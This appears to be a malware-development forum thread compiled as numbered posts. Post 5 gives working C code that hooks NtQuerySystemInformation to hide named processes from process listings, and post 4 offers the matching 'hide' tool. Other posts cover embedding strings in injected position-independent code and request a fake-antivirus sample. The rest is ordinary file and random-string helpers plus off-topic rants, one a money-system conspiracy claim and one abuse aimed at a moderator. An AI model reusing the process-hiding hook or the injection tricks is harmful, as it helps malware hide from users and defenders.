  1. EDIT: both pointers have to be of type (void*): `memcpy((void*)((char*)Result->ptrCode + DestNode->dwSize), (void*)SourceNode->ptrCode, SourceNode->dwSize);`
  2. http://www.cuckoosandbox.org/ https://malwr.com/
  3. You shall inform yourself about the monetary system, especially how money is created and who can create it. It is a big dirty game. For very certain reasons the us fed bank is willing to stop this modern development by bringing doubtable arguments against this modern money revolution. Free your minds, Free the people, Inform yourself. http://www.coindesk.com/ https://en.wikipedia.org/wiki/Barnaby_Jack http://www.c-span.org/Live-Video/C-SPAN/
  4. Here you go: unpack and open "hide.sln" with Visual Studio C++. "/hide/Release/hide.exe" is the precompiled x86 binary; "/hide/x64/Release/hide.exe" is the precompiled x64 binary. To change the build platform: [Alt+F7] -> Configuration Manager (top right corner). Have fun! hide.zip
  // 5. i just compiled it in x64 and x86. it both works. Just the function "NtQuerySystemInformation_Hook" needs some overall fixing. This works in x86 and x64. Here you go:

/*
 * Hook installed in place of NtQuerySystemInformation. It forwards every
 * call to the original (xNtQuerySystemInformation, defined elsewhere) and,
 * only for SystemProcessInformation on a successful call, rewrites the
 * returned SYSTEM_PROCESSES list in place: an entry whose ProcessName
 * matches CheckString() (defined elsewhere) is skipped by adding its
 * NextEntryDelta to the previous entry's, so a consumer walking the list
 * by NextEntryDelta never lands on it. The bytes of the skipped entry are
 * left in the buffer untouched, which is why a scan of the raw buffer, or
 * a comparison against another enumeration source, shows more entries than
 * the walked list -- one way this kind of list tampering is detected.
 *
 * SystemInformationClass  class requested by the caller; passed through.
 * SystemInformation       caller's buffer; only modified for
 *                         SystemProcessInformation.
 * SystemInformationLength size of that buffer; passed through to the
 *                         original call.
 * ReturnLength            passed through unchanged.
 * Returns the NTSTATUS of the original call.
 */
NTSTATUS NTAPI NtQuerySystemInformation_Hook(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL )
{
    PSYSTEM_PROCESSES pSystemProcess;       // entry currently kept (the previous one)
    PSYSTEM_PROCESSES pNextSystemProcess;   // entry under test
    NTSTATUS Result;
    bool walking = true;                    // never read; kept as in the original
    Result = xNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
    if (NT_SUCCESS(Result))
        switch(SystemInformationClass)
        {
        case SystemProcessInformation:
            // The first entry is never tested itself; the walk always looks
            // one entry ahead of pSystemProcess.
            pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
            pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
            while(pSystemProcess->NextEntryDelta != 0)
            {
                if (CheckString(pNextSystemProcess->ProcessName.Buffer))
                {
                    if (pNextSystemProcess->NextEntryDelta==0)
                    {
                        // Matching entry is the last one: terminate the list
                        // at the previous entry.
                        pSystemProcess->NextEntryDelta = 0;
                        break;
                    }
                    else
                    {
                        // Splice the matching entry out and re-test the entry
                        // that follows it, keeping pSystemProcess where it is.
                        pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
                        pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
                        continue;
                    }
                }
                // Not a match: advance both cursors by one entry.
                pSystemProcess = pNextSystemProcess;
                pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
            }
            break;
        }
    return Result;
}
  6. Open "regedit.exe" in an EXE file editor and look at the import section. Open "regedit.exe" in a debugger and hook the imported functions to see in real time which Win32 APIs are called.
  7. Hi, could someone please upload a fakeav sample. for research purpose thanks
  8. Why the fuck did my post get deleted?! What is the reason for this behaviour? Some moderator is deleting my post, then posting something similar and taking credit for it. The super smart moderator has the following options: 1. restore my post 2. delete my other comments and the "thanks" from the thread 3. delete all my threads + all posts from the forum website + delete my account + you are a total loser!
  9. Looks clean and simple. Thanks. Who is the author?
  10. what is this thread about? what do you want to do?
  11. This is how you deal with strings. Example in GCC assembler syntax: `asm("call .+5+13"); asm(".asciz \"Kernel32.dll\""); asm("pop %eax; push %eax;"); // push parameters` `asm("call %P0"::"i"(&GetModuleHandle)); // call GetModuleHandle for Kernel32.dll`. This example embeds the string in the program's code area. The "call" instruction pushes the absolute address of the string "Kernel32.dll" onto the stack and jumps to the instruction following the string; `.+5+13` == address of the current instruction + 18 (5 bytes for the call itself, 13 for the NUL-terminated string).
  12. 0085001F E8 20000000 call 00850044 / 00850024 5B pop ebx — E8 is the relative call opcode; its operand bytes 20 00 00 00 are little-endian, i.e. 0x00000020; the address of the following instruction, 0x00850024, + 0x20 = 0x00850044.
  13. start ollydbg and see how the "call" instruction gets translated
  14. CODE:004037BB call ShowMessage is the only relative function call in your assembly, and at the same time the only function call that will succeed when this assembly is executed in another address space; all other function calls use absolute addresses.
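  // 15. (code shared as StringGen.h / StringGen.cpp / FileAccess.h / FileAccess.cpp)

/* ---- StringGen.h ---- */
void NewSeed ();
void RandomString(char* szString, int dwLength);
int RandomNumber(int iPossibilities);
void RandomBytes(char* szString, int dwLength, int iPossibilities);

/* ---- StringGen.cpp ---- */
#include "StringGen.h"
#include <stdlib.h>
#include <string.h>   /* memset; the include names in the original post were lost in the paste and are reconstructed here */
#include <time.h>     /* time(), fallback seed when no TSC intrinsic is available */
#if defined(_MSC_VER)
#include <intrin.h>   /* __rdtsc */
#endif

/*
 * Seed the C runtime PRNG from the CPU time-stamp counter.
 *
 * The original wrapped a bare `rdtsc` in pushad/popad (.byte 0x60 / 0x61)
 * because its asm clobbered eax/edx without telling the compiler; those two
 * opcodes are invalid in 64-bit mode. Using "=a"/"=d" output constraints
 * (or the __rdtsc intrinsic on MSVC) lets the compiler manage the registers
 * instead. The two halves are mixed with XOR rather than OR, since OR
 * drifts towards all-ones bits. rand() seeded this way is a convenience
 * PRNG only; it is not suitable for security-sensitive values.
 */
void NewSeed ()
{
    unsigned int uLow = 0;
    unsigned int uHigh = 0;
#if defined(__GNUC__) && (defined(__i386__) || defined(__x86_64__))
    __asm__ __volatile__ ("rdtsc" : "=a"(uLow), "=d"(uHigh));
#elif defined(_MSC_VER)
    unsigned long long ullTsc = __rdtsc();
    uLow = (unsigned int)ullTsc;
    uHigh = (unsigned int)(ullTsc >> 32);
#else
    uLow = (unsigned int)time(NULL);   /* no TSC access on this compiler */
#endif
    srand(uLow ^ uHigh);
}

/*
 * Fill szString with dwLength-1 random lowercase letters followed by a
 * terminating NUL (same layout as the original: the last byte is always 0).
 * Writes nothing when szString is NULL or dwLength < 1; the original passed
 * a negative dwLength straight to memset.
 */
void RandomString(char* szString, int dwLength)
{
    if (szString == NULL || dwLength < 1) {
        return;
    }
    memset(szString, 0, (size_t)dwLength);
    for (int i = 0; i < dwLength - 1; i++) {
        szString[i] = (char)('a' + rand() % 26);
    }
}

/*
 * Return an integer in [0, iPossibilities). iPossibilities <= 0 yields 0
 * instead of the modulo-by-zero the original performed.
 */
int RandomNumber(int iPossibilities)
{
    if (iPossibilities <= 0) {
        return 0;
    }
    return rand() % iPossibilities;
}

/*
 * Fill all dwLength bytes of szString with values in [0, iPossibilities).
 * No terminating NUL is written (the buffer is raw bytes, not a string).
 * Writes nothing when szString is NULL, dwLength < 1 or iPossibilities <= 0.
 */
void RandomBytes(char* szString, int dwLength, int iPossibilities)
{
    if (szString == NULL || dwLength < 1 || iPossibilities <= 0) {
        return;
    }
    /* every byte is overwritten, so the original's memset was redundant */
    for (int i = 0; i < dwLength; i++) {
        szString[i] = (char)(rand() % iPossibilities);
    }
}

/* ---- FileAccess.h ---- */
LPVOID FileToMem(LPCSTR szFileName, DWORD_PTR dwPointerToSize);
DWORD MemToFile(LPVOID pFileInMem, DWORD dwSizeOfFile, LPCSTR szFilePath);

/* ---- FileAccess.cpp ---- */
#include <windows.h>

/*
 * Read a whole file into a freshly VirtualAlloc'd buffer.
 *
 * szFileName       path of the file to read.
 * dwPointerToSize  address of a DWORD that receives the file size on success
 *                  and 0 on failure, passed as an integer (0 = not wanted).
 *                  The parameter is DWORD_PTR so the address survives on x64;
 *                  the original DWORD truncated 64-bit pointers. Existing x86
 *                  call sites are unaffected (DWORD_PTR is 32 bits there).
 * Returns the buffer, or NULL on failure (open error, size error, empty file,
 * file larger than 4 GiB, allocation failure or short read). The caller owns
 * the buffer and releases it with VirtualFree(p, 0, MEM_RELEASE).
 */
LPVOID FileToMem(LPCSTR szFileName, DWORD_PTR dwPointerToSize)
{
    DWORD *pdwSize = (DWORD *)dwPointerToSize;
    LPVOID pBuffer = NULL;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD dwSize = 0;
    DWORD dwSizeHigh = 0;
    DWORD dwRead = 0;

    if (pdwSize) {
        *pdwSize = 0;
    }

    hFile = CreateFileA(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL,
                        OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    /* CreateFile reports failure as INVALID_HANDLE_VALUE, never NULL, so the
     * original `if (hFile)` test treated every failed open as a success. */
    if (hFile == INVALID_HANDLE_VALUE) {
        return NULL;
    }

    dwSize = GetFileSize(hFile, &dwSizeHigh);
    if (dwSize == INVALID_FILE_SIZE && GetLastError() != NO_ERROR) {
        goto out_close;
    }
    /* dwSize is a DWORD, so a file with a non-zero high part cannot be read whole */
    if (dwSizeHigh != 0 || dwSize == 0) {
        goto out_close;
    }

    pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
    if (pBuffer == NULL) {
        goto out_close;
    }

    /* a freshly opened handle is already at offset 0; no SetFilePointer needed */
    if (!ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL) || dwRead != dwSize) {
        VirtualFree(pBuffer, 0, MEM_RELEASE);
        pBuffer = NULL;
        goto out_close;
    }

    if (pdwSize) {
        *pdwSize = dwSize;
    }

out_close:
    CloseHandle(hFile);
    return pBuffer;
}

/*
 * Write dwSizeOfFile bytes from pFileInMem to szFilePath, replacing any
 * existing file.
 *
 * Returns 1 on success, 0 on failure (file could not be created, short
 * write, or CloseHandle reporting an error -- CloseHandle flushes, so a
 * failure there means the data may not have reached the disk).
 */
DWORD MemToFile(LPVOID pFileInMem, DWORD dwSizeOfFile, LPCSTR szFilePath)
{
    DWORD dwWritten = 0;
    BOOL bOk = FALSE;
    HANDLE hFile = CreateFileA(szFilePath, GENERIC_WRITE, 0, NULL,
                               CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {   /* same INVALID_HANDLE_VALUE issue as FileToMem */
        return 0;
    }
    bOk = WriteFile(hFile, pFileInMem, dwSizeOfFile, &dwWritten, NULL)
          && dwWritten == dwSizeOfFile;
    if (!CloseHandle(hFile)) {
        bOk = FALSE;
    }
    return bOk ? 1 : 0;
}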